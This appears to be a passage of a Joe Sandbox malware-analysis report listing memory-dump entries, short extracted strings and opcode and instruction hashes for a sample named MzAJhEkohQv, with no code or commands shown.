                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$k$o
                                                • API String ID: 0-3624523832
                                                • Opcode ID: c17e6e5fa9aa99519393bd179479c6e4f375a88559b5e101e7979f6578b8c6d5
                                                • Instruction ID: a04056c99e33763f81d9446e8a2709d5c8c1a4bd3977e4ecd3b95b90ab4cf2ec
                                                • Opcode Fuzzy Hash: c17e6e5fa9aa99519393bd179479c6e4f375a88559b5e101e7979f6578b8c6d5
                                                • Instruction Fuzzy Hash: F5611AB5A00308AFDB64DFA4C884FEFB7BDAF89700F108558E619AB244D675AA41CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                • API String ID: 0-2877786613
                                                • Opcode ID: 0f7dab9e8e6fde8e871e6fb120469bdb3e438132fc1ba393d9bc07b2bcf2b754
                                                • Instruction ID: 7491ec2528a0129e23a19a187d74a053c5af7cb95160503ea01e1ea8d08f31fe
                                                • Opcode Fuzzy Hash: 0f7dab9e8e6fde8e871e6fb120469bdb3e438132fc1ba393d9bc07b2bcf2b754
                                                • Instruction Fuzzy Hash: E7416B799112187FEB01EF90CC52FEF777DAF95610F445048FE04AE280E7B46A8187A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                • API String ID: 0-2877786613
                                                • Opcode ID: 3f1879a7e0e64f81c96fb08fe3de97fb7322e81f961e6ad161cdf80b96a5aae9
                                                • Instruction ID: b942feeaebdad76a1a3f5718c8b3a16367a88c6ff99bc8399ed5e1c3a6d04eb5
                                                • Opcode Fuzzy Hash: 3f1879a7e0e64f81c96fb08fe3de97fb7322e81f961e6ad161cdf80b96a5aae9
                                                • Instruction Fuzzy Hash: A4314A799512187FEB01EB90CC52FEF777DAF95610F445048FE04AF280E7746A8287A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$h$o
                                                • API String ID: 0-3662636641
                                                • Opcode ID: 66e76212d6b1c2e96818f5144cc17f24b81d54cd1462cd3855ab8b1750b7fd6d
                                                • Instruction ID: 26d01a26c9e2cbc084cc5b63228f6588e52570c83afb952b7ac871d7f7681bb5
                                                • Opcode Fuzzy Hash: 66e76212d6b1c2e96818f5144cc17f24b81d54cd1462cd3855ab8b1750b7fd6d
                                                • Instruction Fuzzy Hash: A341B3B5C40358AADB60DFA4CC50FEEB3B8EF48300F4085D9A50DAA144EB746BC48F95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: -$0$2$l
                                                • API String ID: 0-3007954374
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$k$o
                                                • API String ID: 0-3624523832
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$k$o
                                                • API String ID: 0-3624523832